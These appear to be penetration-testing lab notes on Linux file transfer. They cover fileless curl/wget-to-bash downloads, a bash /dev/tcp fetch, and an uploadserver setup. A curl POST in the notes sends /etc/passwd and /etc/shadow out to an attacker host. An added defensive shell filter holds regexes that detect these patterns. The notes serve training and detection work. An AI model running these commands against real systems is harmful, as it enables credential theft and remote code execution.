Linux

Download OPS

Base64 Encode/Decode:

  1. md5sum id_rsa
  2. cat id_rsa | base64 -w 0;echo
  3. echo <base64 string> | base64 -d > somefile
  4. md5sum somefile

wget, CURL

  • curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash - Fileless using cURL
  • wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 - Fileless using wget

Download with BASH:

  • exec 3<>/dev/tcp/10.10.10.32/80 - Connect to the target webserver
  • echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 - HTTP GET Requests
  • cat <&3 - Print the response
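
A defender's view of the fileless cURL/wget and bash /dev/tcp downloads above, as an added example that is not part of the original notes: a POSIX shell filter that flags command lines where curl or wget output is piped into an interpreter, or where bash's /dev/tcp pseudo-device is opened. The function names, rule labels, regexes and sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag download-and-execute command lines in a process log.
# Regexes, rule labels and sample lines are constructed for illustration.

# curl/wget whose output is piped straight into an interpreter.
PIPE_EXEC='(^|[^[:alnum:]_])(curl|wget)[[:space:]][^|]*[|][[:space:]]*(sudo[[:space:]]+)?(bash|sh|zsh|dash|python[0-9.]*|perl|ruby|php)([[:space:]]|$)'
# bash network pseudo-device, e.g. exec 3<>/dev/tcp/HOST/PORT.
DEV_TCP='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# Reads one command line per input line; prints "<rule><TAB><line>" per hit.
flag_fileless() {
  while IFS= read -r cmdline; do
    if printf '%s\n' "$cmdline" | grep -Eq -e "$PIPE_EXEC"; then
      printf 'pipe-to-interpreter\t%s\n' "$cmdline"
    elif printf '%s\n' "$cmdline" | grep -Eq -e "$DEV_TCP"; then
      printf 'bash-dev-tcp\t%s\n' "$cmdline"
    fi
  done
}

# Constructed sample: the page's three commands plus benign look-alikes.
sample_log() {
  cat <<'EOF'
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
exec 3<>/dev/tcp/10.10.10.32/80
curl -o /tmp/report.pdf https://example.com/report.pdf
curl -s https://example.com/api | jq .
curl -s https://example.com/list | shuf
wget https://example.com/index.html
EOF
}

sample_log | flag_fileless
```

Downloads written to disk and pipes into non-interpreters (jq, shuf) are deliberately not flagged; only the three patterns from this page are.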

SSH Download

  • Downloading from a remote host
  • sudo systemctl enable ssh
  • sudo systemctl start ssh
  • netstat -lnpt
  • scp username@192.168.49.128:/root/myroot.txt .
    • Create a dedicated user for SSH file copies instead of using a primary user account

Upload OPS:

  • For binary exploitation and packet capture analysis, we must upload files from our target to our PWNBOX.

Python Uploadserver

PWNBOX:

  1. sudo python3 -m pip install --user uploadserver - Start a Web server
  2. openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server' - Create a self-signed certificate
    • The webserver should not host the certificate
    • Create a new dir to host the file for our webserver
  3. mkdir https && cd https
  4. sudo python3 -m uploadserver 443 --server-certificate ~/server.pem

TARGET MACHINE:

  5. curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

Language WebServers

  • python3 -m http.server
  • python2.7 -m SimpleHTTPServer
  • php -S 0.0.0.0:8888
  • ruby -run -ehttpd . -p8000

SCP Upload:

  • Requires outbound SSH connections (port 22) to be allowed
  • scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
    • Copies /etc/passwd from the local host to the remote host as htb-student